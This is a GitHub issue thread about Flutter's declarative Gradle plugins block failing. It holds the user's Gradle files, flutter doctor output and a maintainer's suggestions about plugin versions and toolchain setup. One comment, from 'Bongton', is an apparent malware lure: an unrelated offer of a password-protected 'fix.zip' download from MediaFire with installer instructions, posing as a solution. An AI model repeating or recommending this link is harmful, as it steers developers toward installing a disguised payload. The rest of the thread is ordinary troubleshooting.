### ISSUE TITLE
Applying gradle's declaratives plugins block not working 

### ISSUE THREAD

**Issue by KatiaRamirez** [flutter/flutter#154176]
### Steps to reproduce

I follow the guide of the docs 
https://docs.flutter.dev/release/breaking-changes/flutter-gradle-plugin-apply

### Actual results

After flutter run I get this error Error: [!] Your app is using an unsupported Gradle project . To fix this problem, create a new project by running `flutter create -t app <app-directory>` and then move the dart code, assets and pubspec.yaml to the new project.

My files look like this: 

settings.gradle

```
pluginManagement {
    def flutterSdkPath = {
        def properties = new Properties()
        file("local.properties").withInputStream { properties.load(it) }
        def flutterSdkPath = properties.getProperty("flutter.sdk")
        assert flutterSdkPath != null, "flutter.sdk not set in local.properties"
        return flutterSdkPath
    }()

    includeBuild("$flutterSdkPath/packages/flutter_tools/gradle")

    repositories {
        google()
        mavenCentral()
        gradlePluginPortal()
    }
}

plugins {
    id "dev.flutter.flutter-plugin-loader" version "1.0.0"
    id "com.android.application" version "7.1.3" apply false
    id "org.jetbrains.kotlin.android" version "1.9.22" apply false
    id "com.google.gms.google-services" version "4.3.0" apply false
}

include ":app"
```
android/app/build.gradle
```
plugins {
    id "dev.flutter.flutter-plugin-loader" 
    id "com.android.application" 
    id "org.jetbrains.kotlin.android" 
    id "com.google.gms.google-services" 
}

def localProperties = new Properties()
def localPropertiesFile = rootProject.file('local.properties')

if (localPropertiesFile.exists()) {
    localPropertiesFile.withReader('UTF-8') { reader ->
        localProperties.load(reader)
    }
}


def envVersionCode =  System.getenv('CI_PIPELINE_ID')
def envVersionName =  System.getenv('RELEASE')
def flutterVersionCode = localProperties.getProperty('flutter.versionCode')
def flutterVersionName = localProperties.getProperty('flutter.versionName')
if (envVersionCode != null){
    flutterVersionCode=envVersionCode
}
if (envVersionName != null){
    flutterVersionName=envVersionName+'.'+envVersionCode
}

if (flutterVersionCode == null) {
    flutterVersionCode = '1'
}

if (flutterVersionName == null) {
    flutterVersionName = '1.0'
}

task printJavaHome{ println "This is versionCode: $flutterVersionCode --------- versionName: $flutterVersionName" }


android {
    compileSdkVersion 34

    sourceSets {
        main.java.srcDirs += 'src/main/kotlin'
    }

    lintOptions {
        disable 'InvalidPackage'
    }

    defaultConfig {
        // TODO: Specify your own unique Application ID (https://developer.android.com/studio/build/application-id.html).
        applicationId ""
        minSdkVersion 21
        targetSdkVersion 34
        multiDexEnabled true
        versionCode flutterVersionCode.toInteger()
        versionName flutterVersionName
        testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner"
        ndk.abiFilters 'armeabi-v7a','arm64-v8a','x86','x86_64'
    }

    buildTypes {
        release {
            // TODO: Add your own signing config for the release build.
            // Signing with the debug keys for now, so `flutter run --release` works.
            signingConfig signingConfigs.debug
        }
    }

    compileOptions{
        sourceCompatibility JavaVersion.VERSION_1_8
        targetCompatibility JavaVersion.VERSION_1_8
    }
    kotlinOptions{
        jvmTarget = '1.8'
    }
}

flutter {
    source '../..'
}

dependencies {
    implementation 'com.android.support:multidex:2.0.1'
    implementation 'com.google.firebase:firebase-analytics:17.2.2'
    testImplementation 'junit:junit:4.12'
    androidTestImplementation 'com.android.support.test:runner:1.0.2'
    androidTestImplementation 'com.android.support.test.espresso:espresso-core:3.0.2'
}

```
android/build.gradle

```
allprojects {
    repositories {
        google()
        mavenCentral()
    }
    configurations.all {
        resolutionStrategy.force "androidx.asynclayoutinflater:asynclayoutinflater:1.0.0",
        "androidx.fragment:fragment:1.0.0"
    }

}

rootProject.buildDir = '../build'
subprojects {
    project.buildDir = "${rootProject.buildDir}/${project.name}"
}
subprojects {
    project.evaluationDependsOn(':app')
}

tasks.register("clean", Delete) {
    delete rootProject.buildDir
}
```

### Flutter Doctor output

[✓] Flutter (Channel stable, 3.22.0, on KDE neon 5.27 6.2.0-39-generic, locale en_US.UTF-8)
    • Flutter version 3.22.0 on channel stable at /home/bitlogic/flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 5dcb86f68f (4 months ago), 2024-05-09 07:39:20 -0500
    • Engine revision f6344b75dc
    • Dart version 3.4.0
    • DevTools version 2.34.3

[!] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
    • Android SDK at /home/bitlogic/Android/Sdk
    ✗ cmdline-tools component is missing
      Run `path/to/sdkmanager --install "cmdline-tools;latest"`
      See https://developer.android.com/studio/command-line for more details.
    ✗ Android license status unknown.
      Run `flutter doctor --android-licenses` to accept the SDK licenses.
      See https://flutter.dev/docs/get-started/install/linux#android-setup for more details.

[✓] Chrome - develop for the web
    • Chrome at google-chrome

[✗] Linux toolchain - develop for Linux desktop
    ✗ clang++ is required for Linux development.
      It is likely available from your distribution (e.g.: apt install clang), or can be downloaded from https://releases.llvm.org/
    ✗ CMake is required for Linux development.
      It is likely available from your distribution (e.g.: apt install cmake), or can be downloaded from https://cmake.org/download/
    ✗ ninja is required for Linux development.
      It is likely available from your distribution (e.g.: apt install ninja-build), or can be downloaded from https://github.com/ninja-build/ninja/releases
    ✗ pkg-config is required for Linux development.
      It is likely available from your distribution (e.g.: apt install pkg-config), or can be downloaded from https://www.freedesktop.org/wiki/Software/pkg-config/

[✓] Android Studio (version 2023.2)
    • Android Studio at /home/bitlogic/android-studio
    • Flutter plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.9+0-17.0.9b1000.46-11084592)

[✓] VS Code (version 1.87.0)
    • VS Code at /usr/share/code
    • Flutter extension version 3.94.0

[✓] Connected device (3 available)
    • sdk gphone64 x86 64 (mobile) • emulator-5554 • android-x64    • Android 13 (API 33) (emulator)
    • Linux (desktop)              • linux         • linux-x64      • KDE neon 5.27 6.2.0-39-generic
    • Chrome (web)                 • chrome        • web-javascript • Google Chrome 122.0.6261.94

[✓] Network resources
    • All expected network resources are available.

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by darshankawar** [comment]
> id "com.android.application" version "7.1.3" apply false
>     id "org.jetbrains.kotlin.android" version "1.9.22" apply false

Could be related to the versions you are passing here. Please check the settings.gradle file example https://docs.flutter.dev/release/breaking-changes/flutter-gradle-plugin-apply#androidsettings-gradle

Also check as mentioned:

`find the values of the Android Gradle Plugin (AGP) and Kotlin that the project currently uses`, ie, try to pass  {agpVersion} and {kotlinVersion} instead of hardcoded versions you have and see if it helps in your case or not.

**Comment by KatiaRamirez** [comment]
I tried your solution but I keep having the same error.

**Comment by darshankawar** [comment]
> [!] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
> • Android SDK at /home/bitlogic/Android/Sdk
> ✗ cmdline-tools component is missing
> Run `path/to/sdkmanager --install "cmdline-tools;latest"`
> See https://developer.android.com/studio/command-line for more details.
> ✗ Android license status unknown.
> Run `flutter doctor --android-licenses` to accept the SDK licenses.
> See https://flutter.dev/docs/get-started/install/linux#android-setup for more details.

Your flutter doctor log shows incomplete setup. Can you try to follow the suggestion, complete the setup as mentioned and then re-run your scenario to check if it helps ?
